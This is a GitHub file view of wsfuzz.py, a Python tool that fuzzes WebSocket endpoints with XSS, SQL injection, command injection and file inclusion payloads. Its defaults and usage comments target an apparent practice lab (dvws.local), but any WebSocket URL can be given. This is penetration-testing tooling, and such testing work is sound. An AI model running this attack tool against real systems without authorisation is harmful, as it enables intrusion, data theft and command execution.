-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwsfuzz.py
More file actions
148 lines (124 loc) · 5.8 KB
/
Copy pathwsfuzz.py
File metadata and controls
148 lines (124 loc) · 5.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import base64
from argparse import ArgumentParser
import urllib
from colorama import init, Fore
from progressbar import progressbar
import wsHandler as w
import banner
# Colours initialization
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
ERROR_LIST = ["invalid", "could not", "can't", "cannot", "error", "incorrect", "connection timed out"]
KEYWORDS = ["wsfuzz"]
# Retrieves command line arguments entered
def args():
parser = ArgumentParser()
subparser = parser.add_subparsers(title='Attack', dest='attack', help='Type of attack to carry out', required=True)
attack_args = [
('xss', 'ws://dvws.local:8080/reflected-xss', 'payloads/xss.txt'),
('sqli', 'ws://dvws.local:8080/authenticate-user-blind', 'payloads/sqli.txt'),
('cmdi', 'ws://dvws.local:8080/command-execution', 'payloads/cmdi.txt'),
('lfi', 'ws://dvws.local:8080/file-inclusion', 'payloads/lfi.txt')
]
# Set default values for different attacks; users can supply their own parameters
for attack, default_target, default_payload in attack_args:
attack_parser = subparser.add_parser(attack)
attack_parser.add_argument('-t', '--target', nargs='?', type=str, help='Target Websocket URL', default=default_target)
attack_parser.add_argument('-r', '--request', nargs='?', type=str, help="Format of an example request, e.g. {'auth_user'':'*','auth_pass':'*'}", default="*")
attack_parser.add_argument('-p', '--payload', nargs='?', type=str, help='Payload file to use', default=default_payload)
attack_parser.add_argument('-e', '--encode', nargs='?', type=str, choices=('none', 'base64', 'hex', 'url'), help='Encoding scheme to use, default=none ', default='none')
return parser.parse_args()
# Return encoded messages based on the selected scheme
def encoding(encoding_scheme, msg):
if encoding_scheme == 'base64':
return base64.b64encode(msg.encode('utf-8')).decode('utf-8')
elif encoding_scheme == 'hex':
return msg.encode('utf-8').hex()
elif encoding_scheme == 'url':
return urllib.parse.quote_plus(msg)
# More methods will be supported in the future
return msg
# Encode and send payloads to server
def test_payloads(payload_list, exampleRequest, ws_conn, encode, attack_name):
categories = []
for payload in progressbar((payload_list), redirect_stdout=True):
line = payload.strip('\n')
if line.startswith('// '):
line = line.strip('// ')
categories.append([line,0])
print(f"[EXECUTING {categories[-1][0]} PAYLOADS]\n")
else:
newRequest = exampleRequest.replace('*', encoding(encode,line))
response = w.InteractWithWsSite(ws_conn, newRequest)
global PAYLOAD
PAYLOAD = line
if check_response(response):
if categories == []:
categories.append(["GENERIC", 0])
categories[-1][1] = 1
print(f"{GREEN}[+]{RESET} {attack_name} successful!")
print(f"{GREEN}[+]{RESET} Payload: %s" % line)
print(f"{GREEN}[+]{RESET} Response: %s\n" % response)
else:
print(f"{RED}[-]{RESET} {attack_name} failed!")
print(f"{RED}[-]{RESET} Payload: %s\n" % line)
return categories
# Different checks to test if response is a valid/successful attack
def check_response(response):
if not response:
return False
if response == ' ':
return False
if PAYLOAD in response:
return True
if any([x in response.casefold() for x in ERROR_LIST]):
return False
if any([x in response.casefold() for x in KEYWORDS]):
return True
return True
# Start attack
def execute_attack(target, payload, example_request, encode, attack_name):
print(f"{GREEN}[+]{RESET} {attack_name} selected! Commencing {attack_name} attack...")
print(f"{GREEN}[+]{RESET} {encode} encoding scheme detected!")
with open(payload, 'r',encoding="utf-8") as payload_file:
payload_list = payload_file.readlines()
ws_connection = w.initWsConn(target)
summary = test_payloads(payload_list, example_request, ws_connection, encode, attack_name)
for category in summary:
if category[1]:
print(f"{GREEN}[+]{RESET} {category[0]} attack successful")
# Close web socket connection after testing payloads
ws_connection.close()
# usage (full)
# python wsfuzz.py {attack_name} -t {target_url} -r {payload_example_string} -p {payload_list} -e {encoding_method}
# python wsfuzz.py sqli -t ws://dvws.local:8080/authenticate-user -r '{"auth_user":"*","auth_pass":""}' -p payloads/custom_sqli.txt -e base64
# python wsfuzz.py cmdi -t ws://dvws.local:8080/command-execution -r "127.0.0.1*" -p payloads/custom_cmdi.txt -e none
# python wsfuzz.py lfi -t ws://dvws.local:8080/file-inclusion -r "*" -p payloads/default/lfi.txt -e none
# python wsfuzz.py xss -t ws://dvws.local:8080/reflected-xss -r "*" -p payloads/custom_xss.txt -e none
# usage (partial)
# python wsfuzz.py xss -t ws://dvws.local:8080/file-inclusion -r "*"
def main():
arg = args()
banner.init_banner()
if not arg.target.startswith(("ws://", "wss://")):
print(f"{RED}[-]{RESET} Please enter a valid WebSocket URL")
exit(0)
attacks = {
'xss': 'XSS',
'lfi': 'LFI',
'sqli': 'SQLi',
'cmdi': 'command injection'
}
attack_name = attacks.get(arg.attack)
if attack_name:
execute_attack(arg.target, arg.payload, arg.request, arg.encode, attack_name)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print(f"{RED}[-]{RESET} User initiated termination, exiting...")
except ConnectionRefusedError:
print(f"{RED}[-]{RESET} Error connecting to target websocket, exiting...")
exit(0)